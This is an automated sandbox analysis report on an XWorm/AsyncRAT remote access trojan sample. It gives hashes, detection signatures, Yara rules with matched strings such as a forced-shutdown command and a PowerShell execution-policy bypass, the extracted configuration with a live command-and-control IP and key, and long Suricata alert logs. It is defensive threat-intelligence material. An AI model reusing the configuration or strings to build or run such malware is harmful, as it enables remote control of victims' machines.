Windows Analysis Report
17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe

Overview

General Information

Sample name: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe
Analysis ID: 1586002
MD5: 5ab0db61a062d4ac36716b51c5ddac3a
SHA1: ad625cd275fafd23bbfbcf81a187031724bdef02
SHA256: 929781941202c78878fbbf8e872f8559cdbd074c4e37f9dfcc8164422fbf9ddc
Tags: base64-decoded, exe, user-abuse_ch

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Yara signature match

Classification

  • System is w10x64
  • cleanup
{"C2 url": ["87.120.116.179"], "Port": 1300, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Yara matches on the submitted sample:

Source | Rule | Description | Author | Strings
17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io | matched strings below
  • 0x6417:$str01: $VB$Local_Port
  • 0x6408:$str02: $VB$Local_Host
  • 0x670c:$str03: get_Jpeg
  • 0x60c7:$str04: get_ServicePack
  • 0x714e:$str05: Select * from AntivirusProduct
  • 0x734c:$str06: PCRestart
  • 0x7360:$str07: shutdown.exe /f /r /t 0
  • 0x7412:$str08: StopReport
  • 0x73e8:$str09: StopDDos
  • 0x74ea:$str10: sendPlugin
  • 0x7696:$str12: -ExecutionPolicy Bypass -File "
  • 0x77bf:$str13: Content-length: 5235
17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | matched strings below
  • 0x7a2c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7ac9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7bde:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x76da:$cnc4: POST / HTTP/1.1

Yara matches on process memory dumps:

Source | Rule | Description | Author | Strings
00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | matched strings below
  • 0x782c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x78c9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x79de:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x74da:$cnc4: POST / HTTP/1.1
00000000.00000002.3782866147.00000000026A1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
Process Memory Space: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe PID: 7776 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

Yara matches on unpacked PE files:

Source | Rule | Description | Author | Strings
0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io | matched strings below
  • 0x6417:$str01: $VB$Local_Port
  • 0x6408:$str02: $VB$Local_Host
  • 0x670c:$str03: get_Jpeg
  • 0x60c7:$str04: get_ServicePack
  • 0x714e:$str05: Select * from AntivirusProduct
  • 0x734c:$str06: PCRestart
  • 0x7360:$str07: shutdown.exe /f /r /t 0
  • 0x7412:$str08: StopReport
  • 0x73e8:$str09: StopDDos
  • 0x74ea:$str10: sendPlugin
  • 0x7696:$str12: -ExecutionPolicy Bypass -File "
  • 0x77bf:$str13: Content-length: 5235
0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | matched strings below
  • 0x7a2c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7ac9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7bde:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x76da:$cnc4: POST / HTTP/1.1
            No Sigma rule has matched
Suricata IDS alerts (SID 2852870, server to client):

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T16:01:13.077801+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:01:16.242604+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:01:24.618805+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:01:36.166777+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:01:46.243779+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:01:47.713242+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:01:59.244040+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:09.782194+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:10.353231+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:13.370500+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:15.489399+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:16.258225+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:17.034068+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:28.556337+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:34.587963+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:36.254498+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:42.464649+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:44.860550+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:44.908106+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:44.955792+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:45.050926+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:45.375712+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:46.232947+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:54.884571+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:03.197868+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:03.293292+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:13.388453+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:15.841576+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:16.234270+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:18.732296+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:30.215641+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:31.244627+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:31.333076+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:42.863753+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:43.908475+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:46.241774+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:51.681589+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:51.770206+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:02.015912+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:02.119378+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:12.201753+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:16.264450+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:16.870901+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:17.371295+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:18.689405+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:22.603185+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:22.707431+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:22.812462+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:22.914038+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:25.762894+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:37.416768+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:38.583436+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:40.068279+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:46.615189+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:48.636507+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:48.735921+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:50.307584+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:53.838493+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:53.935124+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:54.104400+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:54.295618+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:05:00.072731+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP

Suricata IDS alerts (SID 2852923, client to server):

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T16:01:13.127851+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:01:24.620770+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:01:36.170007+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:01:47.714831+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:01:59.246666+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:09.784371+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:10.362630+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:13.374062+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:15.497763+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:17.035854+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:28.557879+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:34.590606+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:36.258427+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:42.466617+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:44.862387+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:44.909886+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:44.957595+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:45.052851+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:45.382678+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:02:54.888266+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:03:03.199865+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:03:03.295087+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:03:13.395074+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:03:15.845023+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:03:18.750360+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:03:30.297465+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:03:31.246525+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:03:31.334683+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:03:31.441862+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:03:31.446747+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:03:42.865670+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:03:43.910630+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:03:51.683612+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:03:51.771932+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:02.018831+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:02.121338+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:12.204105+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:16.881663+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:17.389756+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:18.696855+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:22.613852+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:22.718825+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:22.820238+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:22.921977+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:25.764835+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:37.430720+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:38.585572+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:40.070225+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:48.639685+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:48.744672+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:50.309402+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:53.841621+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:53.941337+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:54.010342+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:54.106204+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:54.201684+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:54.207001+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:04:54.299413+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP
2025-01-08T16:05:00.073653+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP

Suricata IDS alerts (SID 2852874, server to client):

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T16:01:16.242604+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:01:46.243779+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:16.258225+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:02:46.232947+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:16.234270+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:03:46.241774+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:16.264450+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP
2025-01-08T16:04:46.615189+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 87.120.116.179 | 1300 | 192.168.2.9 | 49757 | TCP

Suricata IDS alerts (SID 2853193, client to server):

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T16:02:44.616880+0100 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49757 | 87.120.116.179 | 1300 | TCP

            AV Detection

Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Avira: detected
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Malware Configuration Extractor: Xworm {"C2 url": ["87.120.116.179"], "Port": 1300, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | ReversingLabs: Detection: 84%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Joe Sandbox ML: detected
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | String decryptor: 87.120.116.179
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | String decryptor: 1300
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | String decryptor: <123456789>
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | String decryptor: <Xwormmm>
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | String decryptor: 08-01-25
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | String decryptor: USB.exe
